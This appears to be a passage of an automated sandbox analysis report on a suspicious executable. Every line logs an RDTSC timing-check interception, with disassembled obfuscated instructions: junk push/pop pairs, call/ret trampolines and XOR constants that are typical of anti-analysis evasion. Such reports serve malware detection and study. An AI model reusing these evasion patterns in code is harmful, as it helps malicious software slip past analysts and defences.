Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F0F6F7 second address: F0F725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c pushad 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jnc 00007F8E2D690EE6h 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8E2D690EF5h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F0F725 second address: F0F735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F8E2D68FC5Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F0EBBB second address: F0EBBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F11EA0 second address: F11EAA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8E2D68FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F11FB2 second address: F11FB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F11FB6 second address: F11FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F1207B second address: F12080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F12080 second address: F12086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F12241 second address: F12246 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F12246 second address: F1226F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a xor esi, 04344635h 0x00000010 push 00000000h 0x00000012 add dword ptr [ebp+122D2F3Dh], esi 0x00000018 push 49EEB8B7h 0x0000001d pushad 0x0000001e jnp 00007F8E2D68FC58h 0x00000024 pushad 0x00000025 popad 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F1226F second address: F122B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xor dword ptr [esp], 49EEB837h 0x0000000d cld 0x0000000e push 00000003h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F8E2D690EE8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000003h 0x0000002e mov edi, 2EA69826h 0x00000033 push F3F36F0Bh 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F122B0 second address: F122B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F122B6 second address: F1232B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 33F36F0Bh 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F8E2D690EE8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a and ecx, 7BAE4FA4h 0x00000030 lea ebx, dword ptr [ebp+12457DF9h] 0x00000036 pushad 0x00000037 or dword ptr [ebp+122D2928h], ebx 0x0000003d or esi, dword ptr [ebp+122D3A29h] 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F8E2D690EF7h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F2FB3B second address: F2FB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F2FDBA second address: F2FDCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8E2D690EEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F2FDCE second address: F2FDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c je 00007F8E2D68FC5Ah 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F30081 second address: F300D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F8E2D690EEEh 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 jmp 00007F8E2D690EF7h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007F8E2D690EF9h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F300D4 second address: F300D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F300D8 second address: F300DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F300DC second address: F300E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F30228 second address: F3023E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8E2D690EF0h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F30654 second address: F30666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC5Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F308FF second address: F30903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F30903 second address: F3092F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F8E2D68FC67h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8E2D68FC5Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F30AC5 second address: F30AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D690EF8h 0x00000009 js 00007F8E2D690EE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F30C5C second address: F30C63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F24E56 second address: F24E95 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8E2D690EE6h 0x00000008 jmp 00007F8E2D690EF3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F8E2D690EE8h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8E2D690EF6h 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: EFF561 second address: EFF566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F30DAF second address: F30DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F30DB5 second address: F30DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnc 00007F8E2D68FC58h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3169B second address: F316D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D690EEEh 0x00000009 jmp 00007F8E2D690EEEh 0x0000000e popad 0x0000000f pop ecx 0x00000010 jl 00007F8E2D690F0Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8E2D690EEAh 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F36678 second address: F3667C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F36930 second address: F3693A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8E2D690EECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3867D second address: F3869D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8E2D68FC68h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: EF8AAA second address: EF8AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: EF8AAF second address: EF8AD2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007F8E2D68FC67h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3BC54 second address: F3BC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b jng 00007F8E2D690EE8h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F8E2D690EF2h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3BC7D second address: F3BC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3BC83 second address: F3BC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3B240 second address: F3B244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3B244 second address: F3B24C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3B24C second address: F3B259 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8E2D68FC58h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3B259 second address: F3B25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3B509 second address: F3B50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3B50D second address: F3B528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3B528 second address: F3B55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC5Fh 0x00000009 popad 0x0000000a jne 00007F8E2D68FC62h 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F8E2D68FC5Ah 0x00000017 popad 0x00000018 jg 00007F8E2D68FC64h 0x0000001e jc 00007F8E2D68FC5Eh 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3B7C5 second address: F3B7E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EECh 0x00000007 jmp 00007F8E2D690EEBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3B7E3 second address: F3B7EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3B7EC second address: F3B7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3D6C4 second address: F3D6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3D6C8 second address: F3D6CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3D6CE second address: F3D6D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F8E2D68FC56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3DC77 second address: F3DC7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3EDB4 second address: F3EDDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D276Bh], edi 0x00000010 push 00000000h 0x00000012 xor dword ptr [ebp+122D22C9h], esi 0x00000018 push 00000000h 0x0000001a mov edi, 1B246654h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 pushad 0x00000024 popad 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F3F8C9 second address: F3F8E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F07E55 second address: F07E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F07E5B second address: F07E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F41F2A second address: F41F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4293B second address: F42941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F42720 second address: F42725 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F42941 second address: F429A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov esi, dword ptr [ebp+122D21DBh] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F8E2D690EE8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F8E2D690EE8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c jc 00007F8E2D690EE8h 0x00000052 push edx 0x00000053 pop edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F429A8 second address: F429AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F429AE second address: F429B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F429B2 second address: F429B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F43EE1 second address: F43F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 jmp 00007F8E2D690EEBh 0x0000000c pop eax 0x0000000d nop 0x0000000e add dword ptr [ebp+12452112h], edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F8E2D690EE8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 clc 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D389Dh] 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F43F30 second address: F43F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F8E2D68FC56h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F8E2D68FC56h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F43F4D second address: F43F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F43F51 second address: F43F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F44968 second address: F4496E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F454B6 second address: F454BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4A6AD second address: F4A6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D690EECh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4A6BE second address: F4A6C3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4A6C3 second address: F4A6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F8E2D690EE8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4A6D5 second address: F4A6E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC60h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F499D8 second address: F499DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F499DC second address: F499F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F49AB0 second address: F49AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8E2D690EE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4C5D0 second address: F4C5ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC67h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4C5ED second address: F4C5F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F0642C second address: F06430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F06430 second address: F06441 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F8E2D690EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F06441 second address: F06445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4DCBB second address: F4DCBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4FDBC second address: F4FDC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F50041 second address: F50045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F51F18 second address: F51F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F50F5E second address: F50F64 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F51F1C second address: F51F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
